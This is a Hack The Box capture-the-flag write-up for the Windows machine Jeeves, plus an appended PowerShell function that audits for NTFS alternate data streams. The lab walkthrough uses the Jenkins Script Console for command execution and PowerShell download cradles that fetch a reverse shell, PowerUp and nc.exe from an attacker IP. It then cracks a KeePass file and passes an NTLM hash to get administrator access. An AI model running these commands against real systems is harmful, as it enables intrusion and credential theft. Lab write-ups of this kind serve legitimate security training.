HTB Write-up Jeeves (Windows)

There are two ways to do privesc on this one.

KeePass

Nmap result:

Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-02-09T07:47:47
|_  start_date: 2022-02-09T07:46:15
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s

Screenshots of the web services on port 80 and port 50000 (not preserved in this copy).

Let's do gobuster on both ports.

I found /askjeeves on port 50000.

Visiting the directory, I got into the Jenkins dashboard.

From the Jenkins dashboard, we can open the Script Console under "Manage Jenkins", which lets you run Groovy scripts.

Try:

cmd = "whoami"
println cmd.execute().text

It worked!

Let's grab a PowerShell (.ps1) script from nishang.

Make a new file for this particular box, copy and paste the example execution code from the bottom of the script, and modify the IP.

Run the python http server.

cmd = """ powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.131/powershell.ps1') """
println cmd.execute().text

Now I got the user shell.

Privesc Method 1

Use the PowerUp script from PowerSploit/Privesc/:

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.131/PowerUp.ps1')

and to execute it, run Invoke-AllChecks.

Didn't find much here.

Let's keep enumerating.

We found a KeePass database file (CEH.kdbx).

Let's get the file by creating an SMB server on our Kali machine!

  • You need to have a directory with the share name specified.

Now on the victim's machine, run

New-PSDrive -Name "yatta" -PSProvider "FileSystem" -root "\\10.10.14.131\unchiman"

# Run inside the reverse shell: 
powershell -c '(new-object Net.WebClient).DownloadFile("http://10.10.14.131/nc.exe", "C:\Windows\Temp\nc.exe")'
# OR
powershell -c 'Invoke-WebRequest "http://IP/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"' 

powershell IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.131/nc.exe', "C:\Users\kohsuke\tmp\nc.exe")

The box is very unstable and I lost the connection over and over.

Once we have the KeePass file transferred over, we can run keepass2john CEH.kdbx to get the hash and crack it with hashcat.

The password is moonshine1.

keepass2john gives the hash; hashcat cracks it to moonshine1.

Download KeePass (KeePassXC):

sudo apt-get install keepassxc

Got in.

In the backup file, I found an NTLM hash.

Can we pass-the-hash it?

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

winexe -U jenkins/administrator //10.129.1.109 cmd.exe

This didn't work out.

Tried pth-winexe -U jenkins/administrator //10.129.1.109 cmd.exe and it worked!

hm.txt has the root flag, but it is hidden in an alternate data stream.

dir /r will show hidden data streams (reference: https://www.lifewire.com/dir-command-4050018#:~:text=Dir%20Command%20Options%20%20%20%20Item%20,the%20thousa%20...%20%2013%20more%20rows%20).

more < hm.txt:root.txt:$DATA will reveal it, or

powershell (Get-Content hm.txt -Stream root.txt) works as well.
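The same stream mechanism is what an auditor or incident responder has to look for when triaging a host. The following is an added example, not part of the original write-up: a PowerShell function that walks an NTFS directory tree and reports every file carrying a non-default stream, demonstrated against a throw-away directory with constructed contents (the function name, the demo path and the file/stream names are assumptions of this example).

```powershell
# Audit an NTFS directory tree for alternate data streams (ADS).
# Requires PowerShell 3+ on Windows (Get-Item -Stream is NTFS only).
function Find-AlternateDataStreams {
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Zone.Identifier is the mark-of-the-web stream that browsers add to
        # downloads; it is expected noise and is skipped unless requested.
        [switch] $IncludeZoneId
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        # '-Stream *' enumerates every stream; ':$DATA' is the file's normal content.
        Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Where-Object { $IncludeZoneId -or $_.Stream -ne 'Zone.Identifier' } |
        ForEach-Object {
            [pscustomobject]@{
                File   = $_.FileName
                Stream = $_.Stream
                Bytes  = $_.Length
            }
        }
    }
}

# Constructed demonstration in a temporary directory (hypothetical names,
# mirroring the hm.txt / root.txt layout from the box).
$demo = Join-Path $env:TEMP 'ads-audit-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$file = Join-Path $demo 'hm.txt'
Set-Content -LiteralPath $file -Value 'visible text'
Set-Content -LiteralPath $file -Stream 'root.txt' -Value 'hidden text'

# Expected: one row, hm.txt with a non-default stream named root.txt.
Find-AlternateDataStreams -Path $demo | Format-Table -AutoSize

# Once a suspicious stream is found, its contents can be pulled for triage
# exactly as the write-up does with Get-Content -Stream.
Get-Content -LiteralPath $file -Stream 'root.txt'

Remove-Item -LiteralPath $demo -Recurse -Force
```

Running the function against user-writable locations such as Temp and Downloads is the usual first pass; any stream other than Zone.Identifier on a plain text file is worth opening.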
